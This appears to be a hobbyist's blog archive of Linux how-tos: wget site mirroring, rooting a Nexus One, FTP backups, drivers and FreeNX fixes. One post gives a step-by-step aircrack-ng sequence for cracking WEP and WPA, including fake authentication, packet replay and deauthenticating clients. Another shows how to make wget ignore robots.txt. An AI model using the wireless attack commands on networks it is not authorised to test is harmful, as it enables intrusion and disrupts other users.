Category Archives: BackTrack

Offline Browsing in Linux: wget and some tricks

Ever since I joined Hostgator.com, I’ve been learning a lot of Linux in the hopes that I switch my career into Linux. Hopefully Forensics related.

So this new dilemma I had was to download a website for offline browsing. I went on the hunt for an offline file browser for Linux…. I found that I could use wget to mirror a whole website.

For example, I want to make a copy of blackberrysimunlockcode.com, Here’s how:

wget -m http://blackberrysimunlockcode.com

Here the -m option is telling wget to mirror the website. This is the basic command. But say I need some advanced options. What do I do?

I was trying to get all the script files off of a website to save for later learning and all it was downloading was the index.html and robots.txt
The robots.txt file was blocking user agent wget. To confirm this I used the debug option in wget:

wget -m -d http://blackberrysimunlockcode.com

You’ll get something like:

Not following http://blackberrysimunlockcode.com/privacy.shtml because robots.txt forbids it.

or

Rejecting path sh/eg/talk.sh.txt because of rule `sh’

or

no-follow in index.html

I tried using the option –user-agent “Mozilla” ….. no luck

I tried adding the following in .wgetrc :

## Local settings (for a user to set in his $HOME/.wgetrc). It is
## *highly* undesirable to put these settings in the global file, since
## they are potentially dangerous to “normal” users.
##
## Even when setting up your own ~/.wgetrc, you should know what you
## are doing before doing so.
##

header = Accept-Language: en-us,en;q=0.5
header = Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
header = Accept-Encoding: gzip,deflate
header = Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
header = Keep-Alive: 300
user_agent = Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
referer = http://www.google.com

…Still no luck.

The trick is to use option -e robots=off

So my new command became:

wget -m -k -e robots=off -w 2 --random-wait -U "Mozilla" -np http://blackberrysimunlockcode.com

Heres what the options do:

-m mirrors website
-k fix links so you don’t get directed to www.blackberrysimunlockcode.com/sh/eg instead of /sh/eg (relative vs absolute)
-e executes command robots=off
-w 2 sets wait time as 2 seconds so you don’t overload server and get ip blocked
–random-wait can be random in 2 secon increments
-U sets user agent
-np no parent, so if the current subdirectory/page links to parent pages, it might crawl whole website

Getting root on your new Nexus One Android Google Phone

The Nexus one was rooted before it even got released. Paul at modaco forums showed us how to perform this hack. I’ll try to simplify the method here.

1. First unlock your bootloader if you have a T-mobile Nexus One (this voids the warranty) or get an unlocked version from Google for like $550:

a. download fastboot
b. open terminal or command line and type
– Windows fastboot-windows oem unlock
– Mac ./fastboot-mac oem unlock
– Linux ./fastboot-linux oem unlock

2. Rewrite the Bootloader to obtain root privileges:

a. Download either SuperBoot or InsecureBoot and extract. (The difference is that with the insecure boot you won’t make any changes to the system and you would have to launch su manually)
b. Put the device in bootloader mode:
– Turn off the phone and restart holding the trackball.
c. Flash the bootloader:
– Windows = double click the windows bat file
– Mac = open terminal and cd to the directory containing the file. type
chmod +x install-superboot-mac.sh
./install-superboot-mac.sh

– Linux = open terminal and cd to the directory containing the file. type
chmod +x install-superboot-linux.sh
./install-superboot-linux.sh

Now you should have root!

Rooted Nexus One Google Phone
Pic courtesy of Stericson.

Automatic website backup without SSH enabled over FTP

Last time I backed up my website with rsync and ssh, but on my new host they disabled SSH. Rsync does not work over ftp. I do not want to do incremental backups with delta files like is done with rdiff-backup or duplicity. I need to have an exact mirror of my site. But remember that your sql databases won’t be backed up.

Curlftpfs is the key! In this tutorial I will show you how to backup from one server to a backup location which can be your hard drive, another web host, dropbox folder, Box.net via webdav, etc.

Download curlftpfs, rsync and ncftp:
sudo apt-get install curlftpfs ncftp rsync

make directories to mount your ftp server:
sudo mkdir /media/hydtechblog
sudo mkdir /media/hydtechbackupserver

edit fstab to mount the ftp servers using curlftpfs:
sudo gedit /etc/fstab

add the lines and modify them according to your server:
curlftpfs#username:password@hydtechblog.com /media/hydtechblog fuse rw,allow_other,uid=root 0 0
curlftpfs#username:password@hydtechbackupserver /media/hydtechbackupserver fuse rw,allow_other,uid=root 0 0

One thing to remember is that these two will not mount automatically because when the computer restarts, the fstab is done while you are not connected to the network. To fix this we can just add the mount commands in our crontab.

Edit crontab:
sudo crontab -e
enter the following lines and modify accordingly:
00 09 * * * mount /media/hydtechblog
00 09 * * * mount /media/hydtechbackup
01 09 * * * rsync -avz –rsync-path=/usr/bin/rsync /media/hydtechblog/public_html /media/hydtechbackup/public_html

ctrl + o to write and ctrl + x to save

This will tell cron to mount the folders at 9:00 am and start rsync at 9:01 am. You can replace the backup location to another folder on your hard drive or your dropbox or ubuntu one folder. You can also mount box.net with webdav and use this method.

For encrypted incremental backups checkout duplicity, it also works with webdav and ftp.

Revealing Opera wand passwords on Ubuntu Linux and OS X

There are several utilities in Windows which reveal the opera wand password and I haven’t used windows in forever. The Opera wiki has a Power button which can help capture your password while logging in to the site. Click this link in Opera and it will install a button which you can drag to any panel. While on a page which requires a password, you can click on this new wand instead of your original wand.

Voila!

How to make the Broadcom 4312 Wireless driver work in BackTrack 4 on the Lenovo S10

This guide is adapted from Kazalku’s guide on remote exploit forums. Thanks Kazalku.

Download this driver and transfer it with a USB or boot up into another OS on your multiboot and save it in the BT root folder from here.

Untar it:

tar -xvzf hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz

makefile:
make -C /lib/modules/`uname -r`/build M=`pwd`

Insert the modules:
modprobe ieee80211_crypt_tkip
insmod wl.ko

Now you should have the network Claimed. you can check by:
lshw -C network

Bring it up:
ifconfig eth1 up

To load the module upon boot:

cp wl.ko /lib/modules/`uname -r`/kernel/net/wireless
depmod -a
modprobe wl

Load the module at every startup:
kate /etc/modules

add the following and close the text editor:
ieee80211_crypt_tkip
wl

Load NetworkManager and Configure KnetworkManager:
Type NetworkManager in a konsole and configure the wireless at the bottom right.

Delete the files you created in the root folder now that you dont need them.

Cracking WEP & WPA with IBM Lenovo X60 – Basics

At first injection with the Intel pro wireless cards was impossible. Then came the ipwraw driver. Now, we no longer need the ipwraw as the iwl3945 card supports injection. Most linux distros now ship with this driver.

Follow these steps for a succesful WEP crack in Ubuntu:

download necessary files
sudo apt-get install aircrack-ng

place card in monitor mode
sudo airmon-ng start wlan0

test injection
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80 mon0
(0% means injection not working)

capture data and write to file called output
sudo airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w output mon0

fake authentication
sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

replay mode
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

run aircrack
sudo aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

For WPA cracking follow this:

monitor mode
sudo airmon-ng start wlan0

collect handshake
sudo airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w psk mon0

deauth connected client
sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

cracking
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

These are just refreshers. For more help check www.aircrack-ng.org

Freenx nx server problem in Ubuntu Jaunty 9.04

After upgrading to Jaunty, I never managed to successfully connect to my desktop using NX. I use a windows computer with nomachine nx client. I always got an error like this:

Info: Proxy running in client mode with pid '1728'
Session: Starting session at 'Sat Jan 12 16:34:05 2008'.
Warning: Connected to remote version 3.0.0 with local version 3.1.0
Info: Connection with remote proxy completed.
Warning: Unrecognized session type 'unix-desktop'. Assuming agent session.
Info: Using ADSL link parameters 512/24/1/0.
Info: Using cache parameters 4/4096KB/16384KB/16384KB.
Info: Using pack method 'adaptive-7' with session 'unix-gnome'.
Info: Using ZLIB data compression 1/1/32.
Info: Using ZLIB stream compression 4/4.
Info: No suitable cache file found.
Info: Forwarding X11 connections to display ':0'.
Info: Forwarding multimedia connections to port '6000'.
Info: Listening to font server connections on port '11000'.
Session: Session started at 'Sat Jan 12 16:58:19 2008'.
Info: Established X server connection.
Info: Using shared memory parameters 0/0K.
Session: Terminating session at 'Sat Jan 12 16:58:19 2008'.
Session: Session terminated at 'Sat Jan 12 16:58:19 2008'.

After hours of searching the web, I concluded the problem is with the ownership and permissions of the .Xauthority file. Here’s how I fixed it:
sudo chown hydtech /home/hydtech/.Xauthority
sudo chgrp hydtech /home/hydtech/.Xauthority

and delete:
sudo rm /home/hydtech/.Xauthority-l
sudo rm /home/hydtech/.Xauthority-c

Now it works like a charm.

How to Install packages with slapt-get or gslapt in BackTrack 3

Once BackTrack is installed on the harddrive, open the menu and goto K -> BackTrack -> Penetration -> Fast Track
type:
./fast-track.py -i
snapshot
Enter the Fast-Track updates menu (1).
Update everything (9).
snapshot1

After the update finishes, select the Installation menu (8).
Install everything (8).
Go back to the Installation menu, select Install Slapt-Get (1)
Install Slapt-Get (2), then select update SlackWare (1).
Exit (10)

Now, you can use slapt-get to install packages from the slackware repositories. For example, if you want to install mozilla-thunderbird:
Make sure it exists in the repositories:
slapt-get --search thunderbird
if you find it, use the install parameter to install:
slapt-get --install mozilla-thunderbird-2.0.0.21-i686-1

snapshot2

you can also use the gui front-end for slapt-get, but it is broken by default in BT3. so let’s reinstall it:
slapt-get --install --reinstall gslapt